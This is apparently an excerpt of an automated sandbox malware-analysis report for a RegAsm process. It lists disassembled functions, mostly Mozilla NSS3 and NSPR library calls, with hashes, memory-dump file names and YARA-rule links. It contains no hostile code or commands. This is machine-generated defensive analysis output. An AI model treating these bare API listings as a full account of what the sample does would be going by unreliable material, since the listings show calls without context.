Instruction ID: 4905153569d8748fa83d0ede9c9d82dcbc9816826170d9825a589ea8a61000d7
Opcode Fuzzy Hash: 335cae6fd84b161df0984b00945f78d1a2dbd4c9e607e0e721f01f6bbc35d457
Instruction Fuzzy Hash: F8713DB1D4022D9FDF20DF61DC45BCA77BAAF88314F0405E6E908A3250EA369FA58F55

Function 6CB02D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CB02D9F

Part of subcall function 6C9BCA30: EnterCriticalSection.KERNEL32(?,?,?,6CA1F9C9,?,6CA1F4DA,6CA1F9C9,?,?,6C9E369A), ref: 6C9BCA7A
Part of subcall function 6C9BCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C9BCB26

sqlite3_exec.NSS3(?,?,6CB02F70,?,?), ref: 6CB02DF9
sqlite3_free.NSS3(00000000), ref: 6CB02E2C
sqlite3_free.NSS3(?), ref: 6CB02E3A
sqlite3_free.NSS3(?), ref: 6CB02E52
sqlite3_mprintf.NSS3(6CB6AAF9,?), ref: 6CB02E62
sqlite3_free.NSS3(?), ref: 6CB02E70
sqlite3_free.NSS3(?), ref: 6CB02E89
sqlite3_free.NSS3(?), ref: 6CB02EBB
sqlite3_free.NSS3(?), ref: 6CB02ECB
sqlite3_free.NSS3(00000000), ref: 6CB02F3E
sqlite3_free.NSS3(?), ref: 6CB02F4C

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: c91209c18ad3b5aad4199023336063f4fd421944936ec6569ce9bf947cc228e7
Instruction ID: 9efaae7a22ab4c1ce173b160bcc89a2ab875c320ad68305ba98c9710a7bf2f52
Opcode Fuzzy Hash: c91209c18ad3b5aad4199023336063f4fd421944936ec6569ce9bf947cc228e7
Instruction Fuzzy Hash: 64618FB5F006559BEB00CF68D884B9FBBB5EF69348F154024EC15A7701E731E849CBA2

Function 6CA52C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CA53F23,?,6CA4E477,?,?,?,00000001,00000000,?,?,6CA53F23,?), ref: 6CA52C62
EnterCriticalSection.KERNEL32(0000001C,?,6CA4E477,?,?,?,00000001,00000000,?,?,6CA53F23,?), ref: 6CA52C76
PL_HashTableLookup.NSS3(00000000,?,?,6CA4E477,?,?,?,00000001,00000000,?,?,6CA53F23,?), ref: 6CA52C86
PR_Unlock.NSS3(00000000,?,?,?,?,6CA4E477,?,?,?,00000001,00000000,?,?,6CA53F23,?), ref: 6CA52C93

Part of subcall function 6CADDD70: TlsGetValue.KERNEL32 ref: 6CADDD8C
Part of subcall function 6CADDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CADDDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6CA4E477,?,?,?,00000001,00000000,?,?,6CA53F23,?), ref: 6CA52CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CA4E477,?,?,?,00000001,00000000,?,?,6CA53F23,?), ref: 6CA52CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CA4E477,?,?,?,00000001,00000000,?,?,6CA53F23), ref: 6CA52CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CA4E477,?,?,?,00000001,00000000,?), ref: 6CA52CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CA4E477,?,?,?,00000001,00000000,?), ref: 6CA52D4D
EnterCriticalSection.KERNEL32(?), ref: 6CA52D61
PL_HashTableLookup.NSS3(?,?), ref: 6CA52D71
PR_Unlock.NSS3(?), ref: 6CA52D7E

Part of subcall function 6CA207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C9B204A), ref: 6CA207AD
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9B204A), ref: 6CA207CD
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9B204A), ref: 6CA207D6
Part of subcall function 6CA207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C9B204A), ref: 6CA207E4
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,6C9B204A), ref: 6CA20864
Part of subcall function 6CA207A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA20880
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,?,6C9B204A), ref: 6CA208CB
Part of subcall function 6CA207A0: TlsGetValue.KERNEL32(?,?,6C9B204A), ref: 6CA208D7
Part of subcall function 6CA207A0: TlsGetValue.KERNEL32(?,?,6C9B204A), ref: 6CA208FB

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: 4c9d03428790bcca601698c7832a3ed92bf16c92318f7280178038bd9a371bb2
Instruction ID: ff0b8ff137308e723a5c0c025a1f272e40907f69077523c7332e83d0b11259a1
Opcode Fuzzy Hash: 4c9d03428790bcca601698c7832a3ed92bf16c92318f7280178038bd9a371bb2
Instruction Fuzzy Hash: 8A51E6B6D00504ABDB009F24DD459AA7778FF1A25CB48C624EC1997B12E731E9B8CBE1

Function 6CA47C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CB92120,Function_00097E60,00000000,?,?,?,?,6CAC067D,6CAC1C60,00000000), ref: 6CA47C81

Part of subcall function 6C9B4C70: TlsGetValue.KERNEL32(?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4C97
Part of subcall function 6C9B4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4CB0
Part of subcall function 6C9B4C70: PR_Unlock.NSS3(?,?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4CC9

TlsGetValue.KERNEL32 ref: 6CA47CA0
EnterCriticalSection.KERNEL32(?), ref: 6CA47CB4
PR_Unlock.NSS3 ref: 6CA47CCF

Part of subcall function 6CADDD70: TlsGetValue.KERNEL32 ref: 6CADDD8C
Part of subcall function 6CADDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CADDDB4

TlsGetValue.KERNEL32 ref: 6CA47D04
EnterCriticalSection.KERNEL32(?), ref: 6CA47D1B
realloc.MOZGLUE(-00000050), ref: 6CA47D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA47DF4
PR_Unlock.NSS3 ref: 6CA47E0E

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: 7bd671271e9a18eb3a5ca4aafc13daa84c03c700d22941964a7370c366a1c4e7
Instruction ID: d9390052082a068200d466e1c17436c855ac015e9fcdfb154a94fd619bdd0d56
Opcode Fuzzy Hash: 7bd671271e9a18eb3a5ca4aafc13daa84c03c700d22941964a7370c366a1c4e7
Instruction Fuzzy Hash: 9751D371E551509FDF00AF28CD45B6577B5FB43318F1A8129D945C7722EB3094E4CE92

Function 6C9B4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4CB0
PR_Unlock.NSS3(?,?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4D97
PR_Lock.NSS3(?,?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4DBA
PR_WaitCondVar.NSS3 ref: 6C9B4DD4
PR_Unlock.NSS3(?,?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4DEF

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: da61d3d4534df4a0126af50c1c8b501c46e6ce1367a90380f8d51fd95e3274a1
Instruction ID: b147e034ce80b0171c3cca24ff7c1d313e0a190e88621cd6280d9be881d7dfe2
Opcode Fuzzy Hash: da61d3d4534df4a0126af50c1c8b501c46e6ce1367a90380f8d51fd95e3274a1
Instruction Fuzzy Hash: 4B4190B5A05615DFCB00AF78C68455ABBF8BF06318F094669DC98AB701E730E884DF91

Function 00428B14 Relevance: 18.1, APIs: 12, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00428B2D

Part of subcall function 00424074: Sleep.KERNEL32(00000000,?), ref: 0042409C

__calloc_crt.LIBCMT ref: 00428B51
_free.LIBCMT ref: 00428B5F
__calloc_crt.LIBCMT ref: 00428B6D
_free.LIBCMT ref: 00428B7D
_free.LIBCMT ref: 00428B83
__copytlocinfo_nolock.LIBCMT ref: 00428B92
__setlocale_nolock.LIBCMT ref: 00428B9F
_free.LIBCMT ref: 00428BB8
__setmbcp_nolock.LIBCMT ref: 00428BCA
_free.LIBCMT ref: 00428BD8
_free.LIBCMT ref: 00428BEC

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 3833677464-0
Opcode ID: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
Instruction ID: 316f7d86b509052675ed64499f597221969422cd52b172cd7ffbd25416df4cfd
Opcode Fuzzy Hash: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
Instruction Fuzzy Hash: 392126B1705621BADB217F26F802D4FBBE0DF91758BA0842FF48446261DF39A840C65D

Function 004015E6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004015BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 004015C6
Part of subcall function 004015BC: HeapAlloc.KERNEL32(00000000), ref: 004015CD

MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00401606
GetLastError.KERNEL32 ref: 0040160C
SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00401614
GetWindowContextHelpId.USER32(00000000), ref: 0040161B
GetWindowLongW.USER32(00000000,00000000), ref: 00401623
RegisterClassW.USER32(00000000), ref: 0040162A
IsWindowVisible.USER32(00000000), ref: 00401631
ConvertDefaultLocale.KERNEL32(00000000), ref: 00401638
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401644
IsDialogMessageW.USER32(00000000,00000000), ref: 0040164C
GetProcessHeap.KERNEL32(00000000,?), ref: 00401656
HeapFree.KERNEL32(00000000), ref: 0040165D

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
String ID:
API String ID: 3627164727-0
Opcode ID: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
Instruction ID: 597bc7deab9f95c5419af2560a3a18d661806b2e942c9da5f2f727d66e905f75
Opcode Fuzzy Hash: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
Instruction Fuzzy Hash: 17014672402824FBC7156BA1BD6DDDF3E7CEE4A3527141265F60A910608B794A01CBFE

Function 6CB47CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6CB47CE0

Part of subcall function 6CAF9BF0: TlsGetValue.KERNEL32(?,?,?,6CB40A75), ref: 6CAF9C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB47D36
PR_Realloc.NSS3(?,00000080), ref: 6CB47D6D
PR_GetCurrentThread.NSS3 ref: 6CB47D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6CB47DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB47DD8
malloc.MOZGLUE(00000080), ref: 6CB47DF8
PR_GetCurrentThread.NSS3 ref: 6CB47E06

Strings

:%s:%d:0x%lx, xrefs: 6CB47DB9
NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6CB47DF0

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: d9b4d5a8d14361ea87a5d20b62f9d17510a53f25ee7b3325c3ff95cb2cfa6a2d
Instruction ID: 9d5d2c5b07decda290261be1687150891dca13a9666b4eebb17103c699b7d046
Opcode Fuzzy Hash: d9b4d5a8d14361ea87a5d20b62f9d17510a53f25ee7b3325c3ff95cb2cfa6a2d
Instruction Fuzzy Hash: 6B4149F15142919FDB04CF28CC80D6B37BAFF80328B25856CE819ABB56D770E845DB91

Function 6CB47E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103filestringpipeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB47E37
PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6CB47E46

Part of subcall function 6CA21240: TlsGetValue.KERNEL32(00000040,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA21267
Part of subcall function 6CA21240: EnterCriticalSection.KERNEL32(?,?,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA2127C
Part of subcall function 6CA21240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA21291
Part of subcall function 6CA21240: PR_Unlock.NSS3(?,?,?,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA212A0

PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6CB47EAF
PR_ImportFile.NSS3(?), ref: 6CB47ECF
PR_GetCurrentThread.NSS3 ref: 6CB47ED6
PR_ImportTCPSocket.NSS3(?), ref: 6CB47F01
PR_ImportUDPSocket.NSS3(?,?), ref: 6CB47F0B
PR_ImportPipe.NSS3(?,?,?), ref: 6CB47F15

Strings

NSPR_INHERIT_FDS, xrefs: 6CB47E41
%d:0x%lx, xrefs: 6CB47EA9

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
String ID: %d:0x%lx$NSPR_INHERIT_FDS
API String ID: 2743735569-629032437
Opcode ID: d9e1a3f365d58a27fcecf20f63fdc38d6270f28a9a2019370d0ae25c1cb14767
Instruction ID: 463361eb08997274ab3579f181d7005a02e34a8f5ea92962b216feddc17ac918
Opcode Fuzzy Hash: d9e1a3f365d58a27fcecf20f63fdc38d6270f28a9a2019370d0ae25c1cb14767
Instruction Fuzzy Hash: 2B314570A081D6DBEB009B68C840EAFB7BCEB05348F108665E805B3A15E7B1DC48E792

Function 6CA7ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CA7DE64), ref: 6CA7ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA7ED22

Part of subcall function 6CA8B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB618D0,?), ref: 6CA8B095

PL_FreeArenaPool.NSS3(?), ref: 6CA7ED4A
PL_FinishArenaPool.NSS3(?), ref: 6CA7ED6B
PR_CallOnce.NSS3(6CB92AA4,6CA912D0), ref: 6CA7ED38

Part of subcall function 6C9B4C70: TlsGetValue.KERNEL32(?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4C97
Part of subcall function 6C9B4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4CB0
Part of subcall function 6C9B4C70: PR_Unlock.NSS3(?,?,?,?,?,6C9B3921,6CB914E4,6CAFCC70), ref: 6C9B4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6CA7ED52
PR_CallOnce.NSS3(6CB92AA4,6CA912D0), ref: 6CA7ED83
PL_FreeArenaPool.NSS3(?), ref: 6CA7ED95
PL_FinishArenaPool.NSS3(?), ref: 6CA7ED9D

Part of subcall function 6CA964F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CA9127C,00000000,00000000,00000000), ref: 6CA9650E

Strings

security, xrefs: 6CA7ED06

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 022f8cbcb664986459fcc4efef93d60c560c74b9ca884d4b406f7e25143c7a9e
Instruction ID: b2c36481d0fc345653b79d5b3f27d0289ab28a22932bfad3e17449c114c3ff42
Opcode Fuzzy Hash: 022f8cbcb664986459fcc4efef93d60c560c74b9ca884d4b406f7e25143c7a9e
Instruction Fuzzy Hash: 4A11573E9002046FE6605A66AE45BFB73B8BF4274CF050935E84462F42F720A59CC6F7

Function 6CA62CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6CA62CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CA62D07

Part of subcall function 6CB409D0: PR_Now.NSS3 ref: 6CB40A22
Part of subcall function 6CB409D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB40A35
Part of subcall function 6CB409D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB40A66
Part of subcall function 6CB409D0: PR_GetCurrentThread.NSS3 ref: 6CB40A70
Part of subcall function 6CB409D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB40A9D
Part of subcall function 6CB409D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB40AC8
Part of subcall function 6CB409D0: PR_vsmprintf.NSS3(?,?), ref: 6CB40AE8
Part of subcall function 6CB409D0: EnterCriticalSection.KERNEL32(?), ref: 6CB40B19
Part of subcall function 6CB409D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB40B48
Part of subcall function 6CB409D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB40C76
Part of subcall function 6CB409D0: PR_LogFlush.NSS3 ref: 6CB40C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CA62D22

Part of subcall function 6CB409D0: OutputDebugStringA.KERNEL32(?), ref: 6CB40B88
Part of subcall function 6CB409D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB40C5D
Part of subcall function 6CB409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CB40C8D
Part of subcall function 6CB409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB40C9C
Part of subcall function 6CB409D0: OutputDebugStringA.KERNEL32(?), ref: 6CB40CD1
Part of subcall function 6CB409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB40CEC
Part of subcall function 6CB409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB40CFB
Part of subcall function 6CB409D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB40D16
Part of subcall function 6CB409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CB40D26
Part of subcall function 6CB409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB40D35
Part of subcall function 6CB409D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CB40D65
Part of subcall function 6CB409D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CB40D70
Part of subcall function 6CB409D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB40D90
Part of subcall function 6CB409D0: free.MOZGLUE(00000000), ref: 6CB40D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CA62D3B

Part of subcall function 6CB409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB40BAB
